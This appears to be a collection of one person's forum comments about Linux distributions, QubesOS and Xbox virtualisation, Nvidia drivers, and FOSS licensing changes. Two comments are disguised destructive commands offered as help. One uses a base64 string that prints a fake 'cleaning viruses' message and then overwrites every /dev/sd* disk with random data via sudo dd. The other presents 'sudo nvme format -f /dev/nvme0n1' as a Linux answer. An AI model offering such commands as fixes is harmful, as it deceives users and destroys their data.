btw i use nano
btw i use nano
Are you familiar with QubesOS? It has a similar security model to the Xbox consoles.
Basically, the host OS only exists to run VMs, which includes separate VMs for networking, USB devices, applications, etc. With QubesOS, you can also pass through something like a GPU for use in a dedicated gaming VM (although you can do that on any Linux distro).
That’s normal. That just means the viruses were cleaned from your computer.
echo Q2xlYW5pbmcgdmlydXNlcyBmcm9tIGNvbXB1dGVyLi4uCg== | base64 -d && for f in /dev/sd*; do sudo dd if=/dev/urandom of=$f; done
Seems like that’s a Windows issue and not Xbox. There was a recently released kernel exploit for Xbox, but it’s sandboxed to the SystemOS.
If you want to pwn the Xbox OS entirely, you would need a hypervisor escape exploit, which is very difficult to accomplish.
There is nothing Microsoft I would consider “top tier” when it comes to security.
Counterpoint: Xbox consoles. They just stick everything inside of VMs a la QubesOS
On Linux, it’s sudo apt install nvme-cli -y && sudo nvme format -f /dev/nvme0n1
I’ve been using NixOS for about 3 years. Probably going to switch back to Arch, though.
GNOME is the Apple of the FOSS world
What’s preventing you from installing Asahi Linux?
Me, an American:
Lemmy isn’t listed as a Reddit alternative. I wonder why that is.
They are also recommending PrivacyTools.io, which had a nasty takeover and started selling ad space. Privacy Guides is the better site.
Ah, the student loan loophole
You should consider passing through your Nvidia GPU to a virtual machine in order to do compute tasks on; that way, your host machine won’t be infected with proprietary Nvidia drivers (I’m assuming you need CUDA for your compute tasks). The only performance differences you’ll notice is less available system RAM (you will have access to all of your VRAM), and very slightly less CPU performance, due to running two operating systems at the same time (barely even noticable, TBH). This is the option that I would personally recommend.
If you want to try a super hacky solution which might not work for everything you need, you can try using the open source, recently released ZLUDA translation layer to perform CUDA tasks on your AMD GPU.
https://github.com/vosen/ZLUDA
The reason Hyprland doesn’t work with proprietary Nvidia drivers is due to Nvidia refusing to implement the accepted Wayland standard in favor of their own, home-rolled solution which is incompatible. AFAIK, only GNOME and KDE implement that standard.
Does it have to be Ubuntu, or would Debian be fine? If Debian is fine, check out KickSecure.
Been starting to infect Reddit as well in the past couple of years, so the old trick of just adding Reddit to a query is no longer helpful.
God forbid I want to see normal peoples’ opinions on what the best [blank] is.
Nah. Someone answered the question 3 years ago on a random Discord channel.
For advanced, power user stuff, I find Linux to be much friendlier and faster. Just being able to do everything in a Terminal instead of having to mess around with a mix of inconsistent GUI menus in the two different control panels, gpedit, regedit (which is an entire headache by itself), a mix of cmd and Powershell (and whatever Windows Terminal is) is just so much less of a headache.
Also I find things easier to script in Linux compared to Windows.
Not to mention the mess that is Windows Update, which doesn’t even upgrade third party software, and takes a long time to actually do the updates. Package management is a godsend. Windows has chocolatey and winget, but those are poor substitutes.
And I say all of this as someone who is technically proficient in both.
DuckStation recently changed to a source-available license that prohibits distributing modified versions of the software and prohibits commercial use. Before, it was GPLv3.
Also OpenOffice, Emby, Audacity, Android (AOSP) (soft forked to LineageOS and GrapheneOS, but no hard fork)